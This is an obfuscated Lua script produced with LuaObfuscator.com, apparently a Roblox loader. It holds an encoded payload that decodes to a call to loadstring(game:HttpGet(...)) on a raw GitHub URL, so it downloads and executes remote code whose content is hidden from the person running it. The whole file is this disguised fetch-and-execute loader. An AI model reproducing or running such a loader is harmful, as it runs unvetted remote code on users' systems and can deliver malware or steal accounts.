--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (5==v0) then v16=nil;v16=function(v17,v18,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==1) then v30=function(v40,v41,v42)if v42 then local v80=(v40/((1 + 1)^(v41-(1 + 0))))%(((23 + 1614) -(190 + 1445))^(((v42-(1 + 0)) -(v41-1)) + 1 + 0)) ;return v80-(v80%(1 -(0 -0))) ;else local v81=0 -0 ;local v82;while true do if (v81==0) then v82=(556 -(441 + 113))^(v41-(1 -0)) ;return (((v40%(v82 + v82))>=v82) and (1 + 0)) or (0 -0) ;end end end end;v31=nil;v31=function()local v48=v2(v17,v28,v28);v28=v28 + 1 ;return v48;end;v32=nil;v27=2;end if (v27==2) then v32=function()local v49,v50=v2(v17,v28,v28 + 2 + 0 );v28=v28 + (1906 -(1485 + 419)) ;return (v50 * (1421 -(887 + 278))) + v49 ;end;v33=nil;v33=function()local v51,v52,v53,v54=v2(v17,v28,v28 + (9 -6) );v28=v28 + (755 -(567 + 184)) ;return (v54 * (16778989 -(1480 + 293))) + (v53 * ((142439 -(1634 + 97)) -75172)) + (v52 * 256) + v51 ;end;v34=nil;v27=3;end if (0==v27) then v28=1;v29=nil;v17=v5(v4(v17,5),"..",function(v43)if (v2(v43,2)==79) then local v83=0;while true do if (0==v83) then v29=v1(v4(v43,1,1));return "";end end else local v84=v3(v1(v43,16));if v29 then local v88=0;local v89;while true do if (0==v88) then v89=v6(v84,v29);v29=nil;v88=1;end if (v88==1) then return v89;end end else return v84;end end end);v30=nil;v27=1;end if (5==v27) then v39=nil;v39=function(v44,v45,v46)local v55=0;local v56;local v57;local v58;while true do if (v55==1) then v58=v44[3];return function(...)local v90=0;local v91;local v92;local v93;local v94;local v95;while true do if (v90==2) then v95=nil;v95=function()local v99=v56;local v100=v57;local v101=v58;local v102=v37;local v103={};local v104={};local v105={};for v109=0 + 0 ,v94 do if ((251<=(8891 -6992)) and (v109>=v101)) then v103[v109-v101 ]=v93[v109 + ((247 + 195) -(427 + 14)) ];else v105[v109]=v93[v109 + 1 + (1149 -(499 + 650)) ];end end local v106=(v94-v101) + ((2811 -(261 + 1258)) -((2958 -(1244 + 572)) + 149)) ;local v107;local v108;while true do local v110=0;local v111;while true do if ((v110==0) or ((5417 -(258 + 567))<=(2041 + 51 + 94))) then v111=(2108 -1393) -((594 -(318 + 216)) + 655) ;while true do if (((550 + 2270)==(4403 -(635 + 948))) and (v111==(2 -1))) then if (((4100 + 805)>=(1382 -(485 + 346))) and (v108<=(2 + 0))) then if ((2722>=(241 -167)) and (v108<=(0 -0))) then do return;end elseif ((v108>(1 + 0)) or ((586 + 2198)<=(297 + 346))) then local v133=0;local v134;while true do if (((15183 -10802)==4381) and ((1734 -(827 + 907))==v133)) then v134=v107[1 + 1 ];v105[v134]=v105[v134](v14(v105,v134 + 1 ,v92));break;end end else v105[v107[1 + (1 -0) ]]=v46[v107[1 + 1 + 1 ]];end elseif ((v108<=(808 -(146 + 658))) or (((1972 -(1586 + 79)) + 1479)<=(3090 -(1262 + 673)))) then if ((v108==(5 -2)) or (((40286 -25416) -11194)<=2331)) then local v137=0;local v138;local v139;while true do if ((((687 + 4933) -3317)<4464) and (v137==0)) then local v154=0 + 0 ;while true do if (((1098 + 414)==(1421 + 91)) and (v154==(0 + 0))) then v138=v107[865 -(452 + 411) ];v139=v105[v107[3 + 0 ]];v154=1 + 0 ;end if (((1286 -(97 + (1839 -(200 + 451))))==v154) or ((546 -399)>=(1905 -(61 + 206)))) then v137=1;break;end end end if ((v137==((520 -(374 + 145)) -0)) or ((9642 -4990)<=(837 + 1078))) then v105[v138 + 1 ]=v139;v105[v138]=v139[v107[(8 -4) + 0 ]];break;end end else v105[v107[(2581 -(304 + 1131)) -(206 + 938) ]]=v107[1 + 2 ];end elseif ((2665==((5247 -(1504 + 101)) -(798 + 179))) and (v108>(6 -1))) then v105[v107[1843 -(811 + (2196 -1166)) ]]();else local v142=898 -(382 + 516) ;local v143;local v144;local v145;local v146;local v147;while true do if ((v142==(4 -(1 + 2))) or ((2475 -(2225 -1375))==(2439 + 2339))) then v145=nil;v146=nil;v142=1498 -(199 + 1297) ;end if ((((2429 -(419 + 484)) + 1803)>=2739) and (v142==(1 + 1))) then v147=nil;while true do if (((3665 -(651 + 345))>=((2000 -(69 + 16)) + 447)) and (v143==(3 -1))) then for v174=v144,v92 do local v175=0 + 0 ;local v176;while true do if ((v175==((0 + 0) -0)) or ((7159 -5266)>=((35547 -22119) -8606))) then v176=0 + 0 ;while true do if (((970 + 1924)>=((1079 + 2173) -(1469 + 524))) and (v176==(215 -(33 + 182)))) then v147=v147 + 1 ;v105[v174]=v145[v147];break;end end break;end end end break;end if ((v143==0) or ((471 + 39)>3382)) then local v171=1328 -(624 + 704) ;while true do if ((v171==(0 + 0)) or (((6282 -4832) -((1469 -(1304 + 10)) + 356))<(1532 -(268 + 1029)))) then local v179=0 + 0 ;while true do if (((6168 -1486)==((6823 -3948) + 1807)) and (v179==(1 -0))) then v171=1000 -(571 + 428) ;break;end if ((v179==(1975 -(325 + 1650))) or ((1104 + 1764)>(48 + 3174))) then v144=v107[1 + (2 -1) ];v145,v146=v102(v105[v144](v14(v105,v144 + ((1961 -(10 + 249)) -(736 + 965)) ,v107[12 -9 ])));v179=(3 -2) + 0 ;end end end if ((3228>=2553) and (v171==1)) then v143=1;break;end end end if (((13204 -(9883 + 395))>=2467) and (v143==1)) then local v172=218 -(80 + 138) ;local v173;while true do if ((4717>(2214 -(700 + 407))) and (v172==(0 -0))) then v173=467 -(254 + 213) ;while true do if (((2568 -(731 + 983))==(1690 -(522 + 314))) and (v173==(185 -(29 + 156)))) then local v187=0;while true do if (((503 + 1238 + 1941)<(1004 + 3419)) and (v187==(568 -(501 + 67)))) then v92=(v146 + v144) -1 ;v147=0;v187=3 -(3 -1) ;end if ((3003<=(6783 -(4438 -(509 + 797)))) and (v187==(1683 -((552 -303) + 1433)))) then v173=777 -(702 + 74) ;break;end end end if ((((5133 -2262) -830)<=(4634 -2537)) and ((1468 -(141 + 1326))==v173)) then v143=4 -2 ;break;end end break;end end end end break;end if (((651 + 1996)>(7137 -4583)) and (v142==(0 + 0))) then local v158=(0 -0) -0 ;while true do if (((226 + 1680)<((2928 + 2778) -(287 + 337 + 436))) and (v158==(794 -((157 -58) + 695)))) then v143=0 -0 ;v144=nil;v158=1;end if (((3418 -(816 + 263))>=1154) and ((1148 -((223 -164) + 1088))==v158)) then v142=4 -3 ;break;end end end end end v91=v91 + (1660 -(598 + (2937 -1876))) ;break;end if ((((4594 -(67 + 1069)) -2313)<=1464) and (v111==(573 -(460 + 113)))) then v107=v99[v91];v108=v107[1611 -(199 + (3236 -1825)) ];v111=3 -(1 + 1) ;end end break;end end end end;v90=3;end if (v90==3) then A,B=v37(v12(v95));if  not A[1] then local v112=v44[4][v91] or "?" ;error("Script error at ["   .. v112   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end if (v90==1) then v93={...};v94=v13("#",...) -1 ;v90=2;end if (v90==0) then v91=1;v92= -1;v90=1;end end end;end if (v55==0) then v56=v44[1];v57=v44[2];v55=1;end end end;return v39(v38(),{},v18)(...);end if (v27==3) then v34=function()local v59=0 -(0 + 0) ;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==(744 -(426 + 247 + (279 -208)))) then v60=v33();v61=v33();v59=(1 -0) + (0 -0) ;end if (v59==(2 -0)) then v64=v30(v61,590 -(59 + 510) ,1145 -((1866 -1279) + 527) );v65=((v30(v61,20 + 12 )==(1 -0)) and  -(1 + 0)) or (1 -0) ;v59=755 -(141 + 611) ;end if (v59==(1 + 2)) then if (v64==0) then if (v63==(173 -(146 + 27))) then return v65 * (0 -0) ;else local v98=1254 -(733 + 91 + 430) ;while true do if (v98==((1920 -(1343 + 577)) + 0)) then v64=1 + 0 ;v62=1010 -(526 + 484) ;break;end end end elseif (v64==(2979 -((824 -(258 + 164)) + 530))) then return ((v63==(442 -(116 + 326))) and (v65 * ((1 -0)/(1788 -((1979 -(35 + 482)) + 326))))) or (v65 * NaN) ;end return v9(v65,v64-((6339 -3517) -(1513 + 286)) ) * (v62 + (v63/((1 + 1)^(142 -90)))) ;end if ((1142 -(709 + 432))==v59) then v62=1274 -(1066 + 207) ;v63=(v30(v61,227 -((183 -(14 + 19)) + 76) ,59 -(1662 -(1476 + 147)) ) * (((97 -(44 + 51)) -0)^(1 + 31))) + v60 ;v59=2 + 0 ;end end end;v35=nil;v35=function(v47)local v66;if  not v47 then v47=v33();if (v47==(0 -0)) then return "";end end v66=v4(v17,v28,(v28 + v47) -1 );v28=v28 + v47 ;local v67={};for v78=1 + 0 , #v66 do v67[v78]=v3(v2(v4(v66,v78,v78)));end return v7(v67);end;v36=v33;v27=4;end if (4==v27) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v68=0 + 0 ;local v69;local v70;local v71;local v72;local v73;local v74;local v75;local v76;local v77;while true do if (v68==(2 + 1)) then v75=nil;v76=nil;v68=3 + 1 ;end if (v68~=0) then else v69=0 -0 ;v70=nil;v68=1;end if (v68==(2 + 0)) then v73=nil;v74=nil;v68=2 + 1 ;end if (v68==(8 -4)) then v77=nil;while true do if (v69~=4) then else while true do if (v70==(3 + 0)) then v77=nil;while true do local v118=0 -0 ;local v119;while true do if (v118~=(1940 -(1495 + 445))) then else v119=0 + 0 ;while true do if ((1 -0)~=v119) then else if (v71==(1361 -(467 + 893))) then local v129=0;local v130;while true do if (v129==(0 + 0)) then v130=0 -0 ;while true do if (v130==(1 -0)) then v77={};v71=2;break;end if (v130==(1387 -(964 + 423))) then local v159=0 + 0 ;while true do if (v159==(0 -0)) then v75={v72,v73,nil,v74};v76=v33();v159=1;end if (v159==1) then v130=1276 -(295 + 980) ;break;end end end end break;end end end if (v71==0) then local v131=0;local v132;while true do if (v131==(1953 -(844 + 1109))) then v132=0 + 0 ;while true do if (v132==1) then v74={};v71=1 -0 ;break;end if (v132==0) then local v160=0 -0 ;while true do if (v160==0) then v72={};v73={};v160=1664 -(762 + 901) ;end if (v160~=1) then else v132=1;break;end end end end break;end end end break;end if (v119==(0 -0)) then local v128=0 -0 ;while true do if (v128~=(1231 -(317 + 914))) then else if (v71==2) then local v148=0 -0 ;while true do if (v148~=(398 -(12 + 386))) then else for v162=506 -(498 + 7) ,v76 do local v163=0 -0 ;local v164;local v165;while true do if (v163==(1 -0)) then if (v164==(685 -(650 + 34))) then v165=v31()~=(0 -0) ;elseif (v164==(5 -3)) then v165=v34();elseif (v164==3) then v165=v35();end v77[v162]=v165;break;end if ((1168 -(93 + 1075))==v163) then v164=v31();v165=nil;v163=557 -(377 + 179) ;end end end v75[7 -4 ]=v31();v148=1;end if (v148==1) then for v166=2 -1 ,v33() do local v167=0 + 0 ;local v168;while true do if (v167~=(0 + 0)) then else v168=v31();if (v30(v168,1,1)==(0 + 0)) then local v180=0 -0 ;local v181;local v182;local v183;local v184;local v185;while true do if (v180==(0 + 0)) then v181=0 -0 ;v182=nil;v180=1 + 0 ;end if (v180~=(1 + 0)) then else v183=nil;v184=nil;v180=1 + 1 ;end if ((2 + 0)~=v180) then else v185=nil;while true do if (v181==(0 -0)) then v182=645 -(644 + 1) ;v183=nil;v181=37 -(23 + 13) ;end if (v181==(976 -(178 + 796))) then while true do if (v182~=(0 + 0)) then else local v196=0 + 0 ;while true do if (v196==0) then v183=v30(v168,6 -4 ,3);v184=v30(v168,2 + 2 ,4 + 2 );v196=1;end if (v196==(1 + 0)) then v182=1 + 0 ;break;end end end if (3==v182) then if (v30(v184,912 -(373 + 536) ,661 -(28 + 630) )==(1 + 0)) then v185[4]=v77[v185[1583 -(433 + 1146) ]];end v72[v166]=v185;break;end if (v182==(4 -2)) then local v198=0;while true do if (v198==1) then v182=3;break;end if (v198==0) then if (v30(v184,4 -3 ,1 + 0 )==(1386 -(199 + 1186))) then v185[2]=v77[v185[2]];end if (v30(v184,5 -3 ,378 -(127 + 249) )~=(51 -(5 + 45))) then else v185[3]=v77[v185[3]];end v198=1;end end end if (v182==(1505 -(927 + 577))) then v185={v32(),v32(),nil,nil};if (v183==(0 -0)) then local v201=0 -0 ;local v202;while true do if (v201==0) then v202=509 -(201 + 308) ;while true do if ((0 + 0)~=v202) then else v185[3]=v32();v185[4]=v32();break;end end break;end end elseif (v183==(2 -1)) then v185[1 + 2 ]=v33();elseif (v183==(45 -(8 + 35))) then v185[2 + 1 ]=v33() -(2^16) ;elseif (v183~=(8 -5)) then else local v211=0;local v212;local v213;while true do if (v211~=(0 + 0)) then else v212=0 -0 ;v213=nil;v211=1;end if (v211==(4 -3)) then while true do if (v212==0) then v213=0 + 0 ;while true do if (v213~=0) then else v185[3]=v33() -((3 -1)^16) ;v185[4]=v32();break;end end break;end end break;end end end v182=2 + 0 ;end end break;end if (v181==1) then local v191=0 + 0 ;while true do if (v191==1) then v181=2 + 0 ;break;end if (v191==(486 -(178 + 308))) then v184=nil;v185=nil;v191=1 -0 ;end end end end break;end end end break;end end end v71=3;break;end end end if (v71==(10 -7)) then local v149=0 -0 ;local v150;local v151;while true do if (v149~=(0 -0)) then else v150=0 + 0 ;v151=nil;v149=1;end if (v149==(2 -1)) then while true do if (v150~=(1904 -(1627 + 277))) then else v151=0;while true do local v178=0 -0 ;while true do if (v178~=(1053 -(569 + 484))) then else if (v151==(1 + 0)) then return v75;end if (v151==(1169 -(198 + 971))) then local v188=0;while true do if (v188==1) then v151=1;break;end if (v188==(0 + 0)) then for v192=1,v33() do v73[v192-(1 + 0) ]=v38();end for v194=2 -1 ,v33() do v74[v194]=v33();end v188=1;end end end break;end end end break;end end break;end end end v128=1;end if (v128==(2 -1)) then v119=410 -(193 + 216) ;break;end end end end break;end end end break;end if (v70==1) then local v113=0;local v114;while true do if (v113~=(0 + 0)) then else v114=0 + 0 ;while true do if (v114~=(1452 -(1143 + 309))) then else local v126=0 + 0 ;while true do if (v126~=0) then else v73=nil;v74=nil;v126=1 + 0 ;end if (v126~=(1 + 0)) then else v114=1;break;end end end if (v114~=(1 -0)) then else v70=1 + 1 ;break;end end break;end end end if (v70==(0 + 0)) then local v115=0 + 0 ;while true do if (v115~=(1 + 0)) then else v70=4 -3 ;break;end if ((0 -0)~=v115) then else v71=0 -0 ;v72=nil;v115=1 + 0 ;end end end if (v70~=(1110 -(381 + 727))) then else local v116=0 + 0 ;local v117;while true do if ((1878 -(1003 + 875))==v116) then v117=280 -(188 + 92) ;while true do if (v117~=(1 + 0)) then else v70=4 -1 ;break;end if ((0 -0)==v117) then local v127=0 + 0 ;while true do if ((1 -0)~=v127) then else v117=1;break;end if (v127==0) then v75=nil;v76=nil;v127=1;end end end end break;end end end end break;end if ((2 -0)==v69) then v74=nil;v75=nil;v69=3;end if (v69~=(2 -1)) then else local v96=1219 -(655 + 564) ;while true do if (v96==(1 -0)) then v69=5 -3 ;break;end if (v96==(0 -0)) then v72=nil;v73=nil;v96=1784 -(1472 + 311) ;end end end if (v69==(3 + 0)) then local v97=0 + 0 ;while true do if (v97==1) then v69=4;break;end if (v97~=(0 + 0)) then else v76=nil;v77=nil;v97=1617 -(1403 + 213) ;end end end if (v69==(738 -(600 + 138))) then v70=0;v71=nil;v69=388 -(326 + 61) ;end end break;end if (v68~=(2 -1)) then else v71=nil;v72=nil;v68=2 -0 ;end end end;v27=5;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F505358687567652F312F2O31343531342F3O3600083O0012013O00013O001201000100023O002003000100010003001204000300044O0005000100034O00025O00022O00063O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (3==v0) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end end end
